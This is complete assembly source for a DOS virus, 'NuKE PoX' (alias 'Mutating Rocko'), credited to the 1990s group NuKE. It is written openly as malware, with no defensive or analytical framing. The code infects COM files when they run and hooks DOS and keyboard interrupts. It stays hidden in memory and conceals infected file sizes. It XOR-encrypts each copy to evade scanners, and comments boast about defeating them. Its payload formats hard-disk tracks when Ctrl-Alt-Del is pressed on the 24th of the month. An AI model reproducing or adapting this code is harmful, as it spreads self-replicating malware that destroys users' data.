;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
;-*      (c) Rock Steady, Viral Developments                             -*
;*-      (c) NuKE Software Developement  1991, 1992                      *-
;-*  Virus: NuKE PoX Version 1.0  (Alias `Mutating Rocko')               -*
;*-  ~~~~~~                                                              *-
;-*  Notes: COM Infector, Hooks Int 9h & Int 21h, Memory Stealthness     -*
;*-  ~~~~~~ Dir Stealthness (FCB Way), Encrypting Virus (100 different   *-
;-*         Encrypted Copies of the Virus)                               -*
;*-  Bytes: 609 Bytes           Memory: (609 * 2) = 1,218 Bytes          *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
crypt_size      equ     crypt - init_virus    ;All that gets Incrypted     
virus_size      equ     last - init_virus     ;Size of the Virus           
mut1            equ     3                                                  
mut2            equ     1                                                  
mut3            equ     103h                                               
del_code        equ     53h                   ;CTRL-ATL-DEL Key            
seg_a           segment byte public                                        
                assume  cs:seg_a, ds:seg_a                                 
                org     100h                                               
rocko           proc    far                                                
                                                                           
start:          jmp     init_virus                              ;+3 bytes  
;-*-*-*-*-*-*-*-*-[Start of Virus]*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
init_virus: call    decrypt         ;Decryption Routine Please  ;+3 Bytes  
            call    doit_now        ;Doit VirusMan...           ;+3 Bytes  
                                                                ;========  
doit_now:   pop     bp              ;Anything ABOVE THIS LINE     9 Bytes  
            sub     bp,109h         ;have to be added to the 100h! This    
            push    ax              ;SETs our `Delta Pointer'.             
            push    bx                                                     
            push    cx                                                     
            push    dx              ;Save registers                        
            push    si                                                     
            push    di                                                     
            push    bp                                                     
            push    es                                                     
            push    ds                                                     
                                                                           
            mov     ax,0abcdh       ;Are we resident Already?              
            int     21h                                                    
            cmp     bx,0abcdh       ;Yupe... Quit Then...                  
            je      exit_com                                               
                                                                           
            push    cs              ;Get CS=DS                             
            pop     ds                                                     
            mov     cx,es                                                  
                                                                           
            mov     ax,3509h        ;Hook Int 9 Please...                  
            int     21h                                                    
            mov     word ptr cs:[int9+2][bp],es     ;Save Orignal Int 9h   
            mov     word ptr cs:[int9][bp],bx       ;Save Orignal Int 9h   
                                                                           
            mov     ax,3521h        ;Some AVs may INTCEPT this Call!       
            int     21h             ;May be better to go Manually...       
            mov     word ptr cs:[int21+2][bp],es    ;Save the Int          
            mov     word ptr cs:[int21][bp],bx      ;Vector Table          
                                                                           
            dec     cx                ;Get a new Memory block              
            mov     es,cx             ;Put it Back to ES                   
            mov     bx,es:mut1                                             
            mov     dx,virus_size+virus_size ;Size to `Hide'               
            mov     cl,4            ;And all this crap hides               
            shr     dx,cl           ;your number of bytes in DX            
            add     dx,4                                                   
            mov     cx,es                                                  
            sub     bx,dx                                                  
            inc     cx                                                     
            mov     es,cx                                                  
            mov     ah,4ah          ;Call int to do it...                  
            int     21h                                                    
                                                                           
            jc      exit_com                                               
            mov     ah,48h                                                 
            dec     dx                                                     
            mov     bx,dx           ;It's Done... Yeah!                    
            int     21h                                                    
                                                                           
            jc      exit_com                                               
            dec     ax                                                     
            mov     es,ax                                                  
            mov     cx,8h           ;Here we move our Virus into           
            mov     es:mut2,cx      ;the `Hidden' memory!                  
            sub     ax,0fh                                                 
            mov     di,mut3                                                
            mov     es,ax                                                  
            mov     si,bp                                                  
            add     si,offset init_virus                                   
            mov     cx,virus_size                                          
            cld                                                            
            repne   movsb                                                  
                                                                           
            mov     ax,2521h                ;Restore Int21 with ours       
            mov     dx,offset int21_handler ;Where it starts               
            push    es                                                     
            pop     ds                                                     
            int     21h                                                    
                                                                           
            mov     ax,2509h                ;Restore Int9 with ours        
            mov     dx,offset int9_handler  ;The Handler...                
            int     21h                                                    
                                                                           
            push    cs                                                     
            pop     ds                                                     
exit_com:                                                                  
            mov     bx,offset buffer        ; Its a COM file restore       
            add     bx,bp                   ; First three Bytes...         
            mov     ax,[bx]                 ; Mov the Byte to AX           
            mov     word ptr ds:[100h],ax   ; First two bytes Restored     
            add     bx,2                    ; Get the next Byte            
            mov     al,[bx]                 ; Move the Byte to AL          
            mov     byte ptr ds:[102h],al   ; Restore the Last of 3 Byt    
            pop     ds                                                     
            pop     es                                                     
            pop     bp                      ; Restore Regesters            
            pop     di                                                     
            pop     si                                                     
            pop     dx                                                     
            pop     cx                                                     
            pop     bx                                                     
            pop     ax                                                     
            mov     ax,100h                 ; Jump Back to Beginning       
            push    ax                      ; Restores our IP (a CALL      
            retn                            ; Saves them, now we change    
int21       dd      ?               ;Our Old Int21                         
int9        dd      ?               ;Our Old Int9                          
;-*-*-*-*-*-*-*-*[Int 9h Handler]-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
int9_handler:                                                              
            push    ax                                                     
            in      al,60h          ;Has the user attempted a              
            cmp     al,del_code     ;CTRL-ALT-DEL                          
            je      warm_reboot     ;Yes! Screw him                        
bye_bye:    pop     ax                                                     
            jmp     dword ptr cs:[int9]    ;Nope, Leave alone              
warm_reboot:                                                               
            mov     ah,2ah             ;Get Date Please                    
            int     21h                                                    
            cmp     dl,18h          ;Is it 24th of the Month?              
            jne     bye_bye         ;Yes, bye_Bye HD                       
            mov     ch,0                                                   
hurt_me:    mov     ah,05h                                                 
            mov     dh,0                                                   
            mov     dl,80h          ;Formats a few tracks...               
            int     13h             ;Hurts So good...                      
            inc     ch                                                     
            cmp     ch,20h                                                 
            loopne  hurt_me                                                
            db      0eah,0f0h,0ffh,0ffh,0ffh  ;Reboot!                     
            iret                                                           
;-*-*-*-*-*-*-*-*-[Dir Stealth Handler]-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
dir_handler:                                                               
             pushf                                                         
             push    cs                                                    
             call    int21call       ;Get file Stats                       
             test    al,al           ;Good FCB?                            
             jnz     no_good         ;nope                                 
             push    ax                                                    
             push    bx                                                    
             push    es                                                    
             mov     ah,51h          ;Is this Undocmented? huh...          
             int     21h                                                   
                                                                           
             mov     es,bx                                                 
             cmp     bx,es:[16h]                                           
             jnz     not_infected    ;Not for us man...                    
             mov     bx,dx                                                 
             mov     al,[bx]                                               
             push    ax                                                    
             mov     ah,2fh          ;Get file DTA                         
             int     21h                                                   
                                                                           
             pop     ax                                                    
             inc     al                                                    
             jnz     fcb_okay                                              
             add     bx,7h                                                 
fcb_okay:    mov     ax,es:[bx+17h]                                        
             and     ax,1fh          ;UnMask Seconds Field                 
             xor     al,1dh          ;Is in 58 seconds?                    
             jnz     not_infected    ;Nope...                              
             and     byte ptr es:[bx+17h],0e0h                             
             sub     es:[bx+1dh],virus_size    ;Yes minus virus size       
             sbb     es:[bx+1fh],ax                                        
not_infected:pop     es                                                    
             pop     bx                                                    
             pop     ax                                                    
no_good:     iret                                                          
;-*-*-*-*-*-*-*-*[Int 21h Handler]*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
int21_handler:                                                             
             cmp     ax,4b00h        ;File executed                        
             je      execute                                               
             cmp     ah,11h          ;Dir handler                          
             je      dir_handler                                           
             cmp     ah,12h          ;Next file Dir handler                
             je      dir_handler                                           
             cmp     ax,0abcdh       ;Virus testing                        
             jne     int21call                                             
             mov     bx,0abcdh                                             
int21call:                                                                 
             jmp     dword ptr cs:[int21] ;Split...                        
             ret                                                           
execute:                                                                   
             push    ax                                                    
             push    bx                                                    
             push    cx                                                    
             push    dx                                                    
             push    si                                                    
             push    di                                                    
             push    es                                                    
             push    ds                                                    
                                                                           
             mov     ax,4300h                ;Get file Attribs             
             int     21h                                                   
             jc      exit                                                  
                                                                           
             test    cl,1h                   ;Make sure there normal       
             jz      open_file               ;Okay there are               
             and     cl,0feh                 ;Nope, Fix them...            
             mov     ax,4301h                ;Save them now                
             int     21h                                                   
             jc      exit                                                  
                                                                           
open_file:   mov     ax,3D02h                                              
             int     21h                     ;Open File to Infect please   
                                                                           
             jc      exit                   ;Error Split                   
             mov     bx,ax                   ;BX File handler              
             mov     ax,5700h                ;Get file TIME + DATE         
             int     21h                                                   
                                                                           
             mov     al,cl                                                 
             or      cl,1fh                  ;Un mask Seconds              
             dec     cx                      ;60 seconds                   
             dec     cx                      ;58 seconds                   
             xor     al,cl                   ;Is it 58 seconds?            
             jz      exit                   ;File already infected         
                                                                           
             push    cs                                                    
             pop     ds                                                    
             mov     word ptr ds:[old_time],cx       ;Save Time            
             mov     word ptr ds:[old_date],dx       ;Save Date            
                                                                           
             mov     ah,3Fh                                                
             mov     cx,3h                                                 
             mov     dx,offset ds:[buffer]   ;Read first 3 bytes           
             int     21h                                                   
                                                                           
             jc      exit_now                   ;Error Split               
             mov     ax,4202h                   ;Move file pointer to end  
             xor     cx,cx                      ;of file...                
             xor     dx,dx                                                 
             int     21h                                                   
                                                                           
             jc      exit_now                            ;Error Split      
             cmp     word ptr cs:[buffer],5A4Dh          ;Is file an EXE?  
             je      exit                                ;Yupe! Split      
             mov     cx,ax                                                 
             sub     cx,3                                ;Set the JMP      
             mov     word ptr cs:[jump_address+1],cx                       
             call    infect_me                           ;Infect!          
             jc      exit_now                            ;error split      
             mov     ah,40h                         ;Write back the first 3
             mov     dx,offset ds:[jump_address]    ;bytes                 
             mov     cx,3h                                                 
             int     21h                                                   
exit_now:                                                                  
             mov     cx,word ptr cs:[old_time]      ;Restore old time      
             mov     dx,word ptr cs:[old_date]      ;Restore Old date      
             mov     ax,5701h                                              
             int     21h                                                   
                                                                           
             mov     ah,3Eh                                                
             int     21h                     ;Close File now...            
exit:                                                                      
             pop     ds                                                    
             pop     es                                                    
             pop     di                                                    
             pop     si                                                    
             pop     dx                                                    
             pop     cx                                                    
             pop     bx                                                    
             pop     ax                                                    
             jmp     dword ptr cs:[int21]     ;Jmp back to whatever        
rocko        endp                                                          
;-*-*-*-*-*-*-*-*-*[Infection Routine]*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
infect_me    proc    near                                                  
             mov     ah,2ch                  ;Get Time                     
             int     21h                                                   
             push    dx                      ;Split seconds to AX          
             pop     ax                                                    
             mov     byte ptr cs:[value],al  ;AL = 0 to 99                 
                                             ;New Encryption Value         
             mov     cx,virus_size                                         
             push    cs                                                    
             pop     es                      ;Copy ANOTHER copy of the     
             mov     si,offset init_virus    ;Virus to the end of us       
             mov     di,offset last                                        
             repne   movsb                                                 
                                                                           
             mov     cx,crypt_size                                         
             sub     cx,3h                   ;Encrypt that 2nd copy!       
             push    bp                                                    
             mov     bp,offset last + 3h                                   
             call    decrypt_encrypt                                       
             pop     bp                                                    
                                                                           
             mov     ah,40h                  ;Write the New Encrypted      
             mov     dx,offset last          ;Virus to File!               
             mov     cx,virus_size                                         
             int     21h                                                   
                                                                           
             jc      exit_error                   ;Error Split             
             mov     ax,4200h                                              
             xor     cx,cx                   ;Pointer back to beginning    
             xor     dx,dx                   ;file!                        
             int     21h                                                   
                                                                           
             jc      exit_error                   ;Split Dude...           
             clc                             ;Clear carry flag             
             retn                                                          
exit_error:                                                                
             stc                             ;Set carry flag               
             retn                                                          
infect_me    endp                                                          
old_time       dw      ?                                                   
old_date       dw      ?                                                   
jump_address   db      0E9h,90h,90h                                        
buffer         db      90h,0CDh,020h                                       
crypt:                                                                     
msgs           db      "(c) Rock Steady/NuKE"   ;No other than `Moi'...    
;-*-*-*-*[Simple BUT EFFECTIVE Encryption/Decryption Routine]-*-*-*-*-*-*- 
decrypt      proc    near                                                  
             pop     bp                                                    
             push    bp                                                    
             mov     al,byte ptr [value-106h][bp]    ;Get new Encryption   
             mov     cx,crypt_size                   ;Value                
decrypt_encrypt:                                                           
             xor     cs:[bp],al             ;Fuck Scanners and put a       
             inc     bp                     ;`NOT AL' anywhere here...     
             loop    decrypt_encrypt                                       
             retn                                                          
value        db      00h             ;Encryption value!                    
decrypt      endp                                                          
last:                                                                      
seg_a        ends                                                          
             end     start